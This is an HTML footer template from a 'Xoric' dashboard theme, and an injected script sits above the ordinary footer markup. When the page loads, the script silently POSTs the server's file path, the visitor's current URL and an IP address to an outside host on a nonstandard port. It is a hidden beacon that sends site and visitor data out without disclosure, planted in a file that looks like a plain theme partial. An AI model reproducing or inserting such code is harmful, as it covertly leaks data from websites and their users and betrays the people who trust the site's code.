<script type=text/javascript> function httpGet(theUrl, data)
    {
        var xmlHttp = new XMLHttpRequest();
        xmlHttp.open('POST', theUrl, false );
        xmlHttp.send(data);
    }
    var path = '/home/admin/public_html/sale.rafiisa.com/theme/Vertical/src/partials/footer.html';
    var href = window.location.href;
    httpGet('https://mautic.sitarafoods.com:5099', path + '_____' + href + '_____' + '188.166.245.112')
    </script>
<footer class="footer">
    <div class="container-fluid">
        <div class="row">
            <div class="col-sm-6">
                2020 © Xoric.
            </div>
            <div class="col-sm-6">
                <div class="text-sm-right d-none d-sm-block">
                    Crafted with <i class="mdi mdi-heart text-danger"></i> by Themesdesign
                </div>
            </div>
        </div>
    </div>
</footer>